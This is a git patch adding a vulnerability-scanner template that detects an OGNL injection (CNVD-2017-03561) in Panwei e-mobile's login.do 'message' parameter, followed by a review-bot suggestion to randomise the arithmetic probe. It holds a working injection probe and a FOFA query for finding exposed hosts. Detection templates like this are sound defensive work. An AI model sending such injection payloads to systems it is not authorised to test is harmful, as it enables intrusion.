From 753d4cf839b4481cfd18005c1007ae863f57bc54 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Fri, 12 Aug 2022 00:35:26 +0530
Subject: [PATCH] Create CNVD-2017-03561.yaml
---
cnvd/2017/CNVD-2017-03561.yaml | 34 ++++++++++++++++++++++++++++++++++
1 file changed, 34 insertions(+)
create mode 100644 cnvd/2017/CNVD-2017-03561.yaml
diff --git a/cnvd/2017/CNVD-2017-03561.yaml b/cnvd/2017/CNVD-2017-03561.yaml
new file mode 100644
index 0000000000..efd58260a4
--- /dev/null
+++ b/cnvd/2017/CNVD-2017-03561.yaml
@@ -0,0 +1,34 @@
+id: CNVD-2017-03561
+
+info:
+ name: Panwei e-mobile - Ognl Injection
+ author: ritikchaddha
+ severity: high
+ reference:
+ - https://gitee.com/cute-guy/Penetration_Testing_POC/blob/master/%E6%B3%9B%E5%BE%AEe-mobile%20ognl%E6%B3%A8%E5%85%A5.md
+ metadata:
+ verified: true
+ fofa-query: app="泛微-eMobile"
+ tags: cnvd,cnvd2017,emobile,ognl,panwei
+
+variables:
+ num1: "9999"
+ num2: "5555"
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/login.do?message={{num1}}*{{num2}}"
+ - "{{BaseURL}}/login/login.do?message={{num1}}*{{num2}}"
+
+ stop-at-first-match: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '55544445'
+
+ - type: status
+ status:
+ - 200
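Review bot: The word matcher is pinned to the literal `'55544445'`, the product of the fixed `num1`/`num2` values, so any 200 response that contains that digit string is reported as a high-severity finding. That includes cached pages and ones that merely embed the number. Deriving the operands per run, e.g. `num1: "{{rand_int(800000, 999999)}}"` and the same for `num2`, and matching on the computed product (a `result` variable built with `to_number(num1)*to_number(num2)`) instead of a constant would make a hit much stronger evidence that the expression was actually evaluated. The `info` block also has no `description`. One sentence stating that a match means the `message` parameter of `login.do` was evaluated as an OGNL expression, plus a short `remediation` line, would help whoever triages the result.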